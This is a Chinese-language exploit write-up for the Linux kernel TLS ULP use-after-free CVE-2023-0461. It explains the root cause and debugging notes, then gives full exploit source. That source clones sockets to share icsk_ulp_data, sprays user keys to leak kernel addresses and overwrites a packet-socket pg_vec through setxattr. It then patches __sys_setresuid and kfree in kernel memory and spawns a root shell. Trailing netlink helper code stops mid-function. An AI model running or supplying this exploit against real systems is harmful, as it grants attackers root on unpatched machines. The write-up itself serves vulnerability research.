CVE-2023-0461


环境搭建

commit:2c85ebc57b3e1817b6ce1a6b703928e113a90442

总的config:

defconfig+menuconfig

CONFIG_CONFIGFS_FS=y
CONFIG_SECURITYFS=y
CONFIG_NET_SCHED=y
CONFIG_DEBUG_INFO=y
CONFIG_USER_NS=y #支持新的namespace
CONFIG_USERFAULTFD=y #支持userfaultfd
CONFIG_TLS=y #漏洞触发必要选项
CONFIG_XFRM_ESPINTCP=y #漏洞触发必要选项,二者选其一

(同样是修改了objtool的一个代码)

漏洞原理

Linux 内核在处理 icsk->icsk_ulp_data 指针时存在错误导致 UAF,

源代码:

https://elixir.bootlin.com/linux/v5.10/source/net/ipv4/tcp_ulp.c#L150

主要的tcp_*_ulp函数

如果 socket 设置 ulp 后进入 listen 状态,然后有其他 socket 发起 connect 系统调用请求连接,新创建的 sk 对象会拷贝 icsk->icsk_ulp_data 指针,相关代码位于 sk_clone_lock 函数

根据 tcp_prot 的定义,在 sock_copy 通过 memcpy 拷贝 sk->sk_dontcopy_end 后面的成员时就会拷贝 icsk->icsk_ulp_data ,==漏洞的关键点是对象指针拷贝后没有使用引用计数管理,释放其中一个指针就会导致悬垂指针的产生==。

accept

也就是说,在服务端,建立一个套接字并bind、listen,最后accept,服务端是知道自己的套接字描述符的;然后客户端也建立一个套接字,通过connect连接服务端。但是此时服务端并不知道对面的套接字描述符,或者说知道了也没有用,因为对面套接字的文件描述符只属于客户端进程,对服务端进程来说没有意义。所以服务端要通过accept生成一个新的套接字,用这个套接字代表CS之间的连接。

漏洞触发

connect连接不上的问题

对照GitHub上的脚本复现,发现要想成功连接,需要创建一个namespace,同时还需要使用配置相关网络接口,这里使用GitHub中给出的net_if函数以及netlink_utils.h头文件进行配置:

#include "netlink_utils.h"

#define ADD_LINK RTM_NEWLINK
#define DEL_LINK RTM_DELLINK
#define FLUSH RTM_GETLINK
#define ADD_ADDR RTM_NEWADDR
#define DEL_ADDR RTM_DELADDR
#define ADD_QDISC RTM_NEWQDISC
#define DEL_QDISC RTM_DELQDISC
#define ADD_CLASS RTM_NEWTCLASS
#define DEL_CLASS RTM_DELTCLASS

#define N_NET_INTERFACES 0x1800

/*
 * Build and send one rtnetlink request that targets a network interface.
 *
 * action: netlink message type (ADD_LINK/DEL_LINK/ADD_ADDR/DEL_ADDR).
 * type:   interface kind; also the interface name when n < 0.
 * n:      when >= 0 the interface name becomes "<type>-<n>".
 * opt:    interface flags for link actions; for address actions the base
 *         IPv4 address (host byte order) to which n is added.
 * change: when true, ifi_change is set to 1, otherwise 0.
 *
 * Returns the result of nl_complete_request(), or -1 if the request could
 * not be initialised.
 */
int net_if(int action, char *type, int n, int opt, bool change) {

    struct nlmsghdr *msg;
    struct nlattr *opts;
    struct ifinfomsg ifinfo = {};
    struct ifaddrmsg ifaddr = {};
    char name[0x100] = { 0 };
    int sk;

    // Bounded formatting: an over-long `type` is truncated instead of
    // overflowing `name`.
    if (n >= 0)
        snprintf(name, sizeof(name), "%s-%d", type, n);
    else
        snprintf(name, sizeof(name), "%s", type);

    // Initialize a netlink socket and allocate a nlmsghdr.
    // nl_init_request() reports failure with -1, not 0.
    sk = nl_init_request(action, &msg, NLM_F_REQUEST|NLM_F_CREATE);
    if (sk < 0) {
        perror("nl_init_request()");
        return -1;
    }

    switch (action) {
    case ADD_LINK:
    case DEL_LINK:

        ifinfo.ifi_family = AF_UNSPEC;
        ifinfo.ifi_type = PF_NETROM;
        ifinfo.ifi_index = (action == DEL_LINK) ? if_nametoindex(name) : 0;
        ifinfo.ifi_flags = opt;
        ifinfo.ifi_change = change ? 1 : 0;

        nlmsg_append(msg, &ifinfo, sizeof(ifinfo), NLMSG_ALIGNTO);

        if (action == ADD_LINK) {
            // Setting the MTU below IPV6_MIN_MTU, ipv6 is disabled
            // (https://elixir.bootlin.com/linux/v6.1/source/net/ipv6/addrconf.c#L3537)
            // This way we can get rid of an annoying timer that periodically calls qdisc->enqueue()
            nla_put_u32(msg, IFLA_MTU, 1000);
            nla_put_string(msg, IFLA_IFNAME, name);
            opts = nla_nest_start(msg, IFLA_LINKINFO);
            nla_put_string(msg, IFLA_INFO_KIND, type);
            nla_nest_end(msg, opts);
        }

        break;

    case ADD_ADDR:
    case DEL_ADDR:

        ifaddr.ifa_family = AF_INET;
        ifaddr.ifa_prefixlen = 16;
        ifaddr.ifa_flags = 0;
        ifaddr.ifa_scope = RT_SCOPE_UNIVERSE;
        ifaddr.ifa_index = if_nametoindex(name);

        nlmsg_append(msg, &ifaddr, sizeof(ifaddr), NLMSG_ALIGNTO);
        nla_put_u32(msg, IFA_LOCAL, __bswap_32(opt + n));
        nla_put_u32(msg, IFA_ADDRESS, __bswap_32(opt + n));

        break;

    default:
        // Any other action is sent with the bare header only.
        break;
    }
    // Send the netlink message and deallocate resources
    return nl_complete_request(sk, msg);
}

/*
 * Move the process into new mount, user and network namespaces and bring
 * the loopback interface up inside the new network namespace.
 *
 * Returns 0 on success, -1 if unshare() or the netlink request fails.
 */
int setup_sandbox(void)
{
    if (unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET) < 0) {
        perror("unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET)");
        return -1;
    }

    // Report a failed request instead of silently continuing without "lo".
    if (net_if(ADD_LINK, "lo", -1, IFF_UP, true) < 0) {
        perror("net_if(ADD_LINK, lo)");
        return -1;
    }
    return 0;
}

/* Minimal driver: only enters the sandbox; the result is deliberately unused. */
int main(void)
{
    (void)setup_sandbox();
    return 0;
}

具体的解释看gpt所述:

设置ULP失败原因探究

所以就是先建立一个连接,然后才能给client设置ULP;

之后要将这个client connect一个地址(但是并没有创建套接字),之后才能给client绑定一个地址;

然后创建一个新的套接字去连接这个client,然后client accept,返回的文件描述符和client拥有相同的ULP;

RCU宽限期

对于我们的ulp_data,可能我们虽然close了,但是由于RCU宽限期的原因,可能要等一段时间之后才能真的释放obj;

这个UAF洞的利用很巧妙:close之后会有一系列操作,如果此时的obj已经被我们覆盖了,那么很可能会出错,但如果obj还是正常的就不会出错;而在真正kfree之前会有一个RCU宽限期,我们在这个宽限期内完成UAF写,之后再kfree,就不会出错。

mmap失败原因

笔者得到的错误:

Invalid argument;

这个报错是在笔者使用setxattr修改了pg_vec之后出现的,如果不进行修改,就不会发生这个错误;笔者考虑过可能是写多了的缘故,但是将64个地址改成33个地址之后还是出错;

经过调试发现mmap之前并没有因为setxattr释放了的缘故而导致地址发生改变

发生了空指针解引用;

手动set一个地址:

可以看到成功了;

最终找到了解决方案:利用前面读内核密钥泄露的上一个pg_vec的指针,作为setxattr的内容去写新的pg_vec,然后只修改它的第一个指针为我们的目标地址即可;

目前来看推测page_offset_base,只能先保留高32位,然后逐步-0x100000000来命中了,这个很不稳定;

成功leak!

page_offset_base

patch 内核

教程:

https://tttang.com/archive/1706/

一定要搜函数__sys_setresuid,笔者就是漏了前面的两个下划线,找了半天。。。

这个跳转要干掉:

后边还有个问题就是内存被破坏了,system起不来,经过调试发现是在kfree崩了,具体原因不详,因此笔者索性就用USMA把kfree函数的第一个字节patch成0xc3,直接退出好了;

LEAK

似乎内核密钥被释放掉之后会有内核地址被写入,这个笔者之前学过,没复现成功,没想到在这里给解决了。

这里相当于是那个滞后的free给我们把内核密钥释放了,然后反而帮我们泄露了内核地址了;

内核密钥被释放之后会得到如下内存布局,此后如果能够通过UAF读出来的第一个64位内容就是一个内核代码段地址;(笔者的内核密钥是被一个ulp结构体给释放的,竟然也会有这个字段)

调试

gdb -ex "target remote localhost:1234" -ex "file /mnt/hgfs/VMshare2/cve/v5.10.0/CVE-2023-0461/vmlinux" -ex "c"
p ((struct inet_connection_sock *) osk)->icsk_ulp_data
b user_preparse

bullseye.img适配

首先是RCU宽限期的等待时间需要稍微调整,然后就是这次笔者在pg_vec中依次写入大量内核代码段地址之后mmap成功,最终实现提权:

demo

攻击成功

FINAL-EXP

exp.c


#define _GNU_SOURCE

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdbool.h>
#include <sched.h>
#include <fcntl.h>
#include <string.h>
#include <byteswap.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/sem.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/xattr.h>
#include <sys/socket.h>
#include <linux/tls.h>
#include <linux/if_packet.h>
#include <net/ethernet.h>
#include <net/if.h>
#include <netinet/tcp.h>
#include <netinet/in.h>

#include "netlink_utils.h"

#define ADD_LINK RTM_NEWLINK
#define DEL_LINK RTM_DELLINK
#define FLUSH RTM_GETLINK
#define ADD_ADDR RTM_NEWADDR
#define DEL_ADDR RTM_DELADDR
#define ADD_QDISC RTM_NEWQDISC
#define DEL_QDISC RTM_DELQDISC
#define ADD_CLASS RTM_NEWTCLASS
#define DEL_CLASS RTM_DELTCLASS

#define N_NET_INTERFACES 0x1800

int tls1, tls2, tls3, tls4;

int net_if(int action, char *type, int n, int opt, bool change);

/* Snapshot of the user-mode cs, ss, rflags and rsp taken by save_status(). */
size_t user_cs, user_ss, user_rflags, user_sp;
/*
 * Store the current cs, ss, rsp and rflags into the globals above and print
 * a confirmation line.
 *
 * NOTE(review): the operand order (destination first, no % prefixes) looks
 * like Intel syntax, so this presumably needs -masm=intel on GCC — confirm.
 */
void save_status()
{
asm volatile (
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
/* rflags cannot be moved directly: push it, then pop into the global. */
"pushf;"
"pop user_rflags;"
);
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}
/*
 * Pin the calling process to a single CPU core.
 *
 * core: index of the CPU to run on.
 *
 * Prints a confirmation on success; on failure reports the error and
 * leaves the affinity unchanged.
 */
void bindCore(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);

    // Do not claim success when the kernel rejected the affinity mask.
    if (sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set) < 0) {
        perror("sched_setaffinity");
        return;
    }

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

/*
 * Best-effort helper: write `text` to the file at `path`.
 * Failures are reported with perror() but do not abort the caller.
 */
static void sandbox_write_file(const char *path, const char *text)
{
    int fd = open(path, O_WRONLY);

    if (fd < 0) {
        perror(path);
        return;
    }
    if (write(fd, text, strlen(text)) < 0)
        perror(path);
    close(fd);
}

/*
 * Enter new mount/user/network namespaces, bring "lo" up and map the
 * caller's uid/gid to 0 inside the new user namespace.
 *
 * Returns 0 on success, -1 if unshare() fails.
 */
int setup_sandbox(void)
{
    char edit[0x200];
    // The ids must be sampled BEFORE unshare(): once inside the new user
    // namespace with no mapping, getuid()/getgid() return the overflow id,
    // and writing that value into uid_map/gid_map is rejected.
    const uid_t outer_uid = getuid();
    const gid_t outer_gid = getgid();

    if (unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET) < 0) {
        perror("unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET)");
        return -1;
    }
    net_if(ADD_LINK, "lo", -1, IFF_UP, true);

    // setgroups must be denied before an unprivileged gid_map write.
    sandbox_write_file("/proc/self/setgroups", "deny");

    snprintf(edit, sizeof(edit), "0 %d 1", (int)outer_uid);
    sandbox_write_file("/proc/self/uid_map", edit);

    snprintf(edit, sizeof(edit), "0 %d 1", (int)outer_gid);
    sandbox_write_file("/proc/self/gid_map", edit);
    return 0;
}


/*
 * Build and send one rtnetlink request that targets a network interface.
 *
 * action: netlink message type (ADD_LINK/DEL_LINK/ADD_ADDR/DEL_ADDR).
 * type:   interface kind; also the interface name when n < 0.
 * n:      when >= 0 the interface name becomes "<type>-<n>".
 * opt:    interface flags for link actions; for address actions the base
 *         IPv4 address (host byte order) to which n is added.
 * change: when true, ifi_change is set to 1, otherwise 0.
 *
 * Returns the result of nl_complete_request(), or -1 if the request could
 * not be initialised.
 */
int net_if(int action, char *type, int n, int opt, bool change) {

    struct nlmsghdr *msg;
    struct nlattr *opts;
    struct ifinfomsg ifinfo = {};
    struct ifaddrmsg ifaddr = {};
    char name[0x100] = { 0 };
    int sk;

    // Bounded formatting: an over-long `type` is truncated instead of
    // overflowing `name`.
    if (n >= 0)
        snprintf(name, sizeof(name), "%s-%d", type, n);
    else
        snprintf(name, sizeof(name), "%s", type);

    // Initialize a netlink socket and allocate a nlmsghdr.
    // nl_init_request() reports failure with -1, not 0.
    sk = nl_init_request(action, &msg, NLM_F_REQUEST|NLM_F_CREATE);
    if (sk < 0) {
        perror("nl_init_request()");
        return -1;
    }

    switch (action) {
    case ADD_LINK:
    case DEL_LINK:

        ifinfo.ifi_family = AF_UNSPEC;
        ifinfo.ifi_type = PF_NETROM;
        ifinfo.ifi_index = (action == DEL_LINK) ? if_nametoindex(name) : 0;
        ifinfo.ifi_flags = opt;
        ifinfo.ifi_change = change ? 1 : 0;

        nlmsg_append(msg, &ifinfo, sizeof(ifinfo), NLMSG_ALIGNTO);

        if (action == ADD_LINK) {
            // Setting the MTU below IPV6_MIN_MTU, ipv6 is disabled
            // (https://elixir.bootlin.com/linux/v6.1/source/net/ipv6/addrconf.c#L3537)
            // This way we can get rid of an annoying timer that periodically calls qdisc->enqueue()
            nla_put_u32(msg, IFLA_MTU, 1000);
            nla_put_string(msg, IFLA_IFNAME, name);
            opts = nla_nest_start(msg, IFLA_LINKINFO);
            nla_put_string(msg, IFLA_INFO_KIND, type);
            nla_nest_end(msg, opts);
        }

        break;

    case ADD_ADDR:
    case DEL_ADDR:

        ifaddr.ifa_family = AF_INET;
        ifaddr.ifa_prefixlen = 16;
        ifaddr.ifa_flags = 0;
        ifaddr.ifa_scope = RT_SCOPE_UNIVERSE;
        ifaddr.ifa_index = if_nametoindex(name);

        nlmsg_append(msg, &ifaddr, sizeof(ifaddr), NLMSG_ALIGNTO);
        nla_put_u32(msg, IFA_LOCAL, __bswap_32(opt + n));
        nla_put_u32(msg, IFA_ADDRESS, __bswap_32(opt + n));

        break;

    default:
        // Any other action is sent with the bare header only.
        break;
    }
    // Send the netlink message and deallocate resources
    return nl_complete_request(sk, msg);
}

int tls1, tls2;
/*
 * Create a TCP socket, connect it to a local listener on `port`, and then
 * attach the "tls" upper-layer protocol to it.
 *
 * port: TCP port used for the temporary local listener.
 *
 * Returns the connected socket. Exits the process if socket(), bind(),
 * listen() or connect() fails; a failed TCP_ULP setsockopt is only reported.
 */
int set_ulp(int port){
    struct sockaddr_in addr = { 0 };
    int tls, s;

    tls = socket(AF_INET, SOCK_STREAM, 0);
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (tls < 0 || s < 0) {
        perror("socket");
        exit(-1);
    }

    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = INADDR_ANY;
    addr.sin_port = htons(port);

    // Put the socket into ESTABLISHED state
    if(bind(s, (struct sockaddr *)&addr, sizeof(addr)) < 0){
        perror("bind");
        exit(-1);
    }

    if(listen(s, 0) < 0){
        perror("listen");
        exit(-1);
    }

    if(connect(tls, (struct sockaddr *)&addr, sizeof(addr)) < 0){
        perror("connect");
        exit(-1);
    }

    // Initialize TLS ULP
    if(setsockopt(tls, SOL_TCP, TCP_ULP, "tls", sizeof("tls")) < 0){
        perror("set ulp");
    }

    // NOTE(review): the listener `s` is never accepted on or closed;
    // presumably it is kept open on purpose so the peer stays alive — confirm.
    return tls;
}

/*
 * Turn the already-configured socket `tls` into a listener and accept one
 * connection on it, so that the accepted socket shares `tls`'s
 * icsk_ulp_data pointer.
 *
 * tls:  socket returned by set_ulp().
 * port: TCP port that `tls` is re-bound to.
 *
 * Returns the accepted socket, or -1 if accept() fails. Exits the process
 * if socket(), bind(), listen() or the second connect() fails.
 */
int clone_tls(int tls, int port){
    struct sockaddr_in addr = { 0 };
    socklen_t len = sizeof(addr);
    int s, new;

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0) {
        perror("socket");
        exit(-1);
    }

    // Disconnect the input socket `sk`
    addr.sin_family = AF_UNSPEC;
    addr.sin_addr.s_addr = INADDR_ANY;
    addr.sin_port = htons(port);

    // Connecting with AF_UNSPEC is the disconnect step named above; it has
    // to happen before the socket can be bound and listened on again.
    if (connect(tls, (struct sockaddr *)&addr, sizeof(addr)) < 0)
        perror("connect(AF_UNSPEC)");

    // Listen on `sk` (This should not happen!)
    addr.sin_family = AF_INET;
    if(bind(tls, (struct sockaddr *)&addr, sizeof(addr)) < 0){
        perror("bind2");
        exit(-1);
    }
    if(listen(tls, 0) < 0){
        perror("listen2");
        exit(-1);
    }
    if(connect(s, (struct sockaddr *)&addr, sizeof(addr)) < 0 ){
        perror("connect2");
        exit(-1);
    }

    // Clone icsk_ulp_data
    new = accept(tls, (struct sockaddr *)&addr, &len);
    if (new < 0)
        perror("accept");

    // Now the input socket `sk` and `new`
    // share the same icsk_ulp_data pointer
    return new;
}

#include "key.h"
#define TOTAL_KEYS 60
/* Serial numbers of the keys created by spray_key(), indexed by creation order. */
int kids[TOTAL_KEYS];
/*
 * Allocate up to `times` (capped at TOTAL_KEYS) "user" keys whose payload is
 * `len` bytes long, storing each returned id in kids[].
 *
 * times: number of keys to create.
 * len:   payload length in bytes; must fit the 0x200-byte staging buffer.
 *
 * Key i gets a description of 0x80 bytes of 'A'+i and a payload of 'a'+i.
 */
void spray_key(int times, int len){
    char des[0x100];
    char pay[0x200];

    // Reject lengths that would overflow the on-stack payload buffer.
    if (len < 0 || (size_t)len > sizeof(pay)) {
        fprintf(stderr, "spray_key: payload length %d out of range\n", len);
        return;
    }

    memset(des, 0, sizeof(des));
    memset(pay, 0, sizeof(pay));
    for(int i = 0; i < TOTAL_KEYS && i < times; i++){
        memset(des, 'A'+i, 0x80);
        memset(pay, 'a'+i, len);
        kids[i] = key_alloc(des, pay, len);
        printf("kid_%d == %d\n", i, kids[i]);
    }
}

#include <sys/types.h>
#include <sys/xattr.h>

/*
 * Call setxattr() `times` times with a value buffer of `size` bytes.
 *
 * times: number of setxattr() calls.
 * size:  length of the attribute value passed to each call.
 *
 * The value starts with the bytes of "value" and is zero-filled after that,
 * so every call reads exactly `size` valid bytes.
 */
void spray_attr(int times, int size){
    const char *path = "/path/to/file";
    const char *name = "user.attribute";
    const char seed[] = "value";
    int flags = 0; // may be XATTR_CREATE or XATTR_REPLACE
    size_t seed_len = sizeof(seed);
    char *value;

    if (size < 0)
        return;

    // The original passed the 6-byte literal with an arbitrary `size`,
    // reading past the end of it; back the value with a real buffer.
    value = calloc(1, size > 0 ? (size_t)size : 1);
    if (!value) {
        perror("calloc");
        return;
    }
    if ((size_t)size < seed_len)
        seed_len = (size_t)size;
    memcpy(value, seed, seed_len);

    for(int i = 0; i < times; i++){
        setxattr(path, name, value, size, flags);
    }
    free(value);
}

size_t data[0x20000];
int pipe_kernel[2];

#include "pg_vec.h"
/*
 * Child-side helper: enter new namespaces, then block until one size_t value
 * arrives on pipe_kernel[0].
 *
 * The received value is only read, not used further in this function.
 */
void child(){
    size_t kernel_offset_base;

    unshare_setup();
    puts("here child");
    // Read exactly one size_t; report a failed or short read.
    if (read(pipe_kernel[0], &kernel_offset_base, sizeof(kernel_offset_base))
            != (ssize_t)sizeof(kernel_offset_base))
        perror("read(pipe_kernel)");
    puts("end2");

}
/*
 * Allocate a single "user" key.
 *
 * des_chr: byte repeated 0x80 times to form the key description.
 * pay_chr: byte repeated `len` times to form the payload.
 * len:     payload length; must fit the 0x400-byte staging buffer.
 *
 * Returns the result of key_alloc(), or -1 if `len` is out of range.
 */
int get_one_key(char des_chr, char pay_chr, int len){
    char des[0x100];
    char pay[0x400];

    // Guard the on-stack payload buffer against oversized requests.
    if (len < 0 || (size_t)len > sizeof(pay))
        return -1;

    memset(des, 0, sizeof(des));
    memset(des, des_chr, 0x80);
    memset(pay, 0, sizeof(pay));
    memset(pay, pay_chr, len);
    return key_alloc(des, pay, len);
}
size_t data2[0x10000];
/*
 * Print the value of the caller's `init_cred` variable as a pointer,
 * followed by "hello". Wrapped in do/while so it is one statement.
 */
#define print_init_cred() \
    do { \
        printf("%p\n", (void *)init_cred); \
        puts("hello"); \
    } while (0)

/*
 * Write the two bytes 0x48 0xbf followed by the 8-byte value of the caller's
 * `init_cred` variable into the buffer `con` (10 bytes in total).
 * The original second memcpy had no size argument and did not compile.
 */
#define mov_rdi_init_cred(con) \
    do { \
        memcpy((con), "\x48\xbf", 2); \
        memcpy((char *)(con) + 2, &init_cred, 8); \
    } while (0)


/* Receives the first key_read() of the sprayed key; entry 0 is then rebased. */
size_t ker_base[0x20000];
/*
 * Entry point of the proof-of-concept.
 *
 * Visible flow: pin to CPU 0, enter new namespaces and bring "lo" up, build
 * two socket pairs that share an icsk_ulp_data pointer (set_ulp + clone_tls),
 * close the first pair and allocate one key, read the key back twice, close
 * the second pair, then repeatedly call setxattr() with a 0x200-byte buffer
 * and mmap() a packet-socket ring to overwrite bytes at fixed offsets, and
 * finally call setresuid(0, 0, 0) and start a shell.
 *
 * NOTE(review): every hard-coded address and offset below is presumably tied
 * to the exact kernel build described in the write-up — confirm before reuse.
 */
int main(void)
{
size_t kernel_offset_base;
bindCore(0);
save_status();
unshare_setup();
net_if(ADD_LINK, "lo", -1, IFF_UP, true);

/* First pair: tls2 is accepted from tls1 and shares its ULP data. */
tls1 = set_ulp(1111);
tls2 = clone_tls(tls1, 1112);
printf("tls1 == %d, tls2 == %d\n", tls1, tls2);

/* Second pair, kept open until after the first leak. */
tls3 = set_ulp(1113);
tls4 = clone_tls(tls3, 1114);
printf("tls3 == %d, tls4 == %d\n", tls3, tls4);

/* Close both sockets of the first pair; per the write-up the sleeps wait
 * out the RCU grace period before the object is actually freed. */
close(tls1);
puts("sleeping ... ");
sleep(3);
close(tls2);
puts("sleeping ... ");
sleep(3);
/* One key with a 0x100-byte payload; its id lands in kids[0]. */
spray_key(1, 0x100);
/* NOTE(review): this 0x1000-element local shadows the global data[0x20000];
 * the key_read() below is given a 0x20000-byte limit for it — confirm which
 * buffer was intended. */
size_t data[0x1000];
puts("spray key done");
getchar();


int key_len = key_read(kids[0], ker_base, 0x20000);
/* Convert the first value read into an offset from a fixed address. */
ker_base[0] -= 0xffffffff820464c0;

/* Packet socket with 33 ring blocks of 0x1000 bytes each. */
int pfd = pagealloc_pad(33, 0x1000);
printf("pfd == %d\n", pfd);

key_len = key_read(kids[0], data, 0x20000);
printf("key_len == %d\n", key_len);
/* Take the first of the first 0x100 values that falls inside the range
 * below and keep only its upper bits.
 * NOTE(review): kernel_offset_base stays uninitialised if nothing matches. */
for(int i = 0; i < 0x100; i++){
if(data[i] >= 0xffff888000000000 && data[i] <= 0xfffffff000000000){
printf("data -> %p\n", (void *)data[i]);
kernel_offset_base = data[i] & 0xfffffff000000000;
break;
}

}
printf("kernel_offset_base == %p\n", (void *)kernel_offset_base);
getchar();

/* Same close/sleep sequence for the second pair. */
close(tls3);
puts("sleeping ... ");
sleep(3);
close(tls4);
puts("sleeping ... ");
sleep(3);

/* Note: pfd is overwritten; the first packet socket stays open. */
pfd = pagealloc_pad(33, 0x1000);
printf("pfd == %d\n", pfd);

for(int i = 0; i < 34; i++){
printf("data-> %p\n", (void *)data[i]);
}

/* Build the setxattr payload from the values read earlier: three entries
 * shifted by 0x3000, then 30 entries copied verbatim, then entry 0 replaced. */
for(int i = 0; i < 3; i++){
data2[i] = data[i] + 0x3000;
}
memcpy(data2+3, data, 30*8);
data2[0] = kernel_offset_base;

const char *path = "/test";
const char *name = "user.attribute";
const char *value = data2;
size_t size = 0x200;
int flags = 0; // may be XATTR_CREATE or XATTR_REPLACE

puts("before setxattr");
getchar();

int result ;
result = setxattr(path, name, value, size, flags);
if (result == -1) {
perror("setxattr");
//return 1;
}

puts("before mmap");
//getchar();
/* No mmap() happens here: page is just 0, so the MAP_FAILED check further
 * down cannot trigger at this point. */
size_t *page = 0LL;
//if (page == MAP_FAILED) {
//perror("mmap");
//exit(-1);
//}
printf("page == %p\n", (void *)page);

data2[0] += 0x9d000;
result = setxattr(path, name, value, size, flags);
if (result == -1) {
perror("setxattr");
//return 1;
}
if (page == MAP_FAILED) {
perror("mmap");
//exit(-1);
}
printf("page == %p\n", (void *)page);

/* kbase is only printed; it is not used in any later computation. */
size_t kbase = 0xffffffff81000040;
printf("kbase == %p\n", (void *)kbase);
size_t init_cred = ker_base[0] + 0xffffffff8244c6c0;

//================================================== patch kernel ============================================================
/* Point entry 0 at a fixed address plus the computed offset, map the ring,
 * and overwrite bytes at fixed offsets in the first mapped page with 0x90,
 * followed by 0x48 0xbf and the 8-byte init_cred value.
 * NOTE(review): per the write-up this targets __sys_setresuid — confirm the
 * offsets against the kernel image. */
data2[0] = ker_base[0] + 0xffffffff8107a000;
result = setxattr(path, name, value, size, flags);
if (result == -1) {
perror("setxattr");
//return 1;
}
page = mmap(NULL, 0x1000*33, PROT_READ|PROT_WRITE, MAP_SHARED, pfd, 0); // the mmap size must be aligned with addr
if (page == MAP_FAILED) {
perror("mmap");
//exit(-1);
}
char *p = (char *)page;
printf("page == %p\n", (void *)page);
memset(p+0xace, 0x90, 6);
memset(p+0xad7, 0x90, 2);
memset(p+0xade, 0x90, 6);
memset(p+0xae8, 0x90, 2);
memset(p+0xaee, 0x90, 6);

memset(p+0xbbb, 0x90, 2);
memcpy(p+0xbbd, "\x48\xbf", 2);
memcpy(p+0xbbd+2, &init_cred, 8);



//=============================================== patch kfree ===========================================================
/* Same technique with a different target address; two 0xc3 bytes are
 * written at offset 0x200 of the mapping.
 * NOTE(review): the write-up speaks of patching one byte; this writes two. */
data2[0] = ker_base[0] + 0xffffffff811d4000;
result = setxattr(path, name, value, size, flags);
if (result == -1) {
perror("setxattr");
//return 1;
}
page = mmap(NULL, 0x1000*33, PROT_READ|PROT_WRITE, MAP_SHARED, pfd, 0); // the mmap size must be aligned with addr
if (page == MAP_FAILED) {
perror("mmap");
//exit(-1);
}
p = page;
memset(p+0x200, 0xc3, 2);
//===========================================================================================================================

int end_pfd = pagealloc_pad(33, 0x1000);
printf("end_pfd == %d\n", end_pfd);

setresuid(0, 0, 0);
system("/bin/sh");

/* Spin forever after the shell returns, so main never returns. */
while(1){
;
}



}
/*
* Utils used to communicate with the kernel via Netlink.
* Useful for static linking.
*/

#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/if_addr.h>
#include <linux/pkt_sched.h>

#define PAGE_SIZE 0x1000
#define NL_AUTO_SEQ 0
#define NL_AUTO_PID 0

/* Return the address just past the message, using its aligned length. */
void *nlmsg_tail(const struct nlmsghdr *msg)
{
    unsigned char *base = (unsigned char *)msg;

    return base + NLMSG_ALIGN(msg->nlmsg_len);
}

/* Return a pointer to the payload that follows the netlink header. */
void *nlmsg_data(const struct nlmsghdr *msg)
{
    void *payload = NLMSG_DATA(msg);

    return payload;
}

/* Return the number of payload bytes: total message length minus the header. */
int nlmsg_datalen(const struct nlmsghdr *msg)
{
    const unsigned int total = msg->nlmsg_len;

    return total - NLMSG_HDRLEN;
}

/*
 * Allocate a zeroed 0x1000-byte buffer for one netlink message and set its
 * length to that of an empty message. Returns NULL if allocation fails.
 */
struct nlmsghdr *nlmsg_alloc(void)
{
    struct nlmsghdr *hdr = calloc(1, 0x1000);

    if (hdr != NULL)
        hdr->nlmsg_len = NLMSG_ALIGN(NLMSG_LENGTH(0));

    return hdr;
}

/*
 * Allocate a message and fill in its type and flags; sequence number and
 * port id are set to the "auto" values. Returns NULL if allocation fails.
 */
struct nlmsghdr *nlmsg_init(int type, int flags)
{
    struct nlmsghdr *hdr = nlmsg_alloc();

    if (hdr == NULL)
        return NULL;

    hdr->nlmsg_pid = NL_AUTO_PID;
    hdr->nlmsg_seq = NL_AUTO_SEQ;
    hdr->nlmsg_flags = flags;
    hdr->nlmsg_type = type;

    return hdr;
}

/* Release a message obtained from nlmsg_alloc()/nlmsg_init(). */
void nlmsg_free(struct nlmsghdr *msg)
{
    void *buffer = msg;

    free(buffer);
}

/*
 * Open a NETLINK_ROUTE socket and allocate a request of the given type.
 *
 * On success stores the new message in *msg and returns the socket.
 * Returns -1 if the socket or the message cannot be created; the socket is
 * closed again when only the allocation fails.
 */
int nl_init_request(int type, struct nlmsghdr **msg, int flags)
{
    struct nlmsghdr *request;
    int fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);

    if (fd < 0)
        return -1;

    request = nlmsg_init(type, flags);
    if (request == NULL) {
        close(fd);
        return -1;
    }

    *msg = request;
    return fd;
}

/*
 * Reserve `len` bytes at the current end of the message and grow its length
 * by `len` rounded up to netlink alignment; the padding bytes are zeroed.
 *
 * `pad` is accepted but not used. Returns a pointer to the reserved area.
 */
void *nlmsg_reserve(struct nlmsghdr *msg, size_t len, int pad)
{
    const size_t padded = NLMSG_ALIGN(len);
    char *slot = (char *)msg + msg->nlmsg_len;

    (void)pad;
    msg->nlmsg_len += padded;

    if (padded > len)
        memset(slot + len, 0, padded - len);

    return slot;
}

/*
 * Append `len` bytes from `data` to the message.
 * Returns 0 on success, -1 if no space could be reserved.
 */
int nlmsg_append(struct nlmsghdr *msg, void *data, size_t len, int pad)
{
    void *dst = nlmsg_reserve(msg, len, pad);

    if (!dst)
        return -1;

    memcpy(dst, data, len);
    return 0;
}

/*
 * Send `msg` on the netlink socket `sk` with a single-element iovec.
 * Returns the sendmsg() result, or -1 when `sk` is negative.
 */
int nl_sendmsg(int sk, struct nlmsghdr *msg)
{
    if (sk < 0)
        return -1;

    /*
     * NLMSG_GOODSIZE (0xec0) is added to the message length so that
     * netlink_alloc_large_skb() allocates the skb with vmalloc():
     * https://elixir.bootlin.com/linux/v6.1/source/net/netlink/af_netlink.c#L1190
     * This keeps noise out of the kmalloc-512 slabs.
     */
    struct iovec iov = {
